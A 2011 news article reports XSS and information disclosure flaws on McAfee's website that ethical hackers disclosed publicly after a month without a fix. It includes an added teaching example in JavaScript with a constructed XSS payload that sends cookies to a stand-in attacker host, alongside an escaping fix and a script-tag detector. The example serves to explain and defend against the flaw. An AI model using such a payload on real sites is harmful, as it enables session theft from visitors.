Security Holes Exposed on McAfee's Website

By on March 29th, 2011 13:41 GMT

McAfee has patched multiple cross-site scripting (XSS) and information disclosure vulnerabilities on its website that were exposed by ethical hackers.

The vulnerabilities were publicly disclosed, still unpatched, on the Full Disclosure mailing list after McAfee failed to address them for over a month.

According to members of the YGN Ethical Hacker Group who found the security flaws, the security giant said on February 12 that it was working on resolving the issues.

However, on March 27 the vulnerabilities were still not fixed, which led to the group's decision to disclose them publicly.

In total, three vulnerabilities were identified: a cross-site scripting weakness in download.mcafee.com and two information disclosure bugs, in www.mcafee.com and download.mcafee.com respectively.

"It is important to note that these vulnerabilities do not expose any of McAfee's customer, partner or corporate information. Additionally, we have not seen any malicious exploitation of the vulnerabilities," the company said, according to CNET.

The cross-site scripting flaw could have allowed attackers to craft convincing attacks that abused McAfee's brand, since the injected content would have been served from McAfee's own domain. Given that McAfee is a trusted antivirus vendor, the impact of such an attack would have been considerably greater than on an ordinary site.

The information disclosure flaws exposed the site's server-side source code and could have been used to learn details about McAfee's internal web applications.

Cross-site scripting bugs are among the most common types of web vulnerabilities and can be found on almost any website, including those belonging to security vendors.

They stem from user-supplied input (form fields, URL parameters, headers) being written into a web page without adequate validation or output encoding; in the worst case, this lets an attacker inject script that executes in the browsers of other visitors, in the context of the vulnerable site.
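To make the mechanism concrete, here is an added example (not code from the article, and not McAfee's own site code) of a reflected XSS bug in a server-rendered search page, next to its hardened form. The attacker payload, page markup and function names are all constructed for illustration. The point it shows is that the fix is not "validating the form" but encoding the value for the HTML context it lands in, so the same input that produces a live script tag in the vulnerable version is rendered as inert text in the hardened one.

```javascript
// Added example: reflected XSS in a server-rendered search page.
// Hypothetical code and constructed input; not the article's or McAfee's.

// Constructed attacker input, the kind of value an attacker would place
// in a link's ?q= parameter to steal cookies from anyone who clicks it.
const ATTACK_QUERY =
  '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

// VULNERABLE: the user-controlled query is concatenated straight into HTML,
// once in element text and once inside a double-quoted attribute value.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>\n` +
         `<input name="q" value="${query}">`;
}

// Encoder for HTML text content and double-quoted attribute values.
// Every character that could close the current context is replaced.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// HARDENED: the same page, but every interpolation is encoded for its context.
// No input validation is involved; the browser simply never sees a tag.
function renderSearchHardened(query) {
  const safe = escapeHtml(query);
  return `<h1>Results for: ${safe}</h1>\n` +
         `<input name="q" value="${safe}">`;
}

// Minimal check a unit test or scanner can run against rendered output:
// did the attacker's payload survive as a real <script> element?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
console.log('vulnerable page executes script:',
  containsLiveScript(renderSearchVulnerable(ATTACK_QUERY)));
console.log('hardened page executes script:',
  containsLiveScript(renderSearchHardened(ATTACK_QUERY)));
```

Note that `escapeHtml` is only correct for the two contexts used here (element text and quoted attribute values). Input that is reflected into a URL, an inline script block or an event-handler attribute needs a different encoder for that context, which is why template engines that auto-escape per context are preferable to hand-rolled string replacement.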

McAfee is certainly not the first antivirus company to have security vulnerabilities on its website, but the fact that it left them unaddressed for over a month is worrying.

An individual XSS flaw usually takes only minutes to fix, which is why many researchers publish them immediately instead of notifying the vendor in advance.
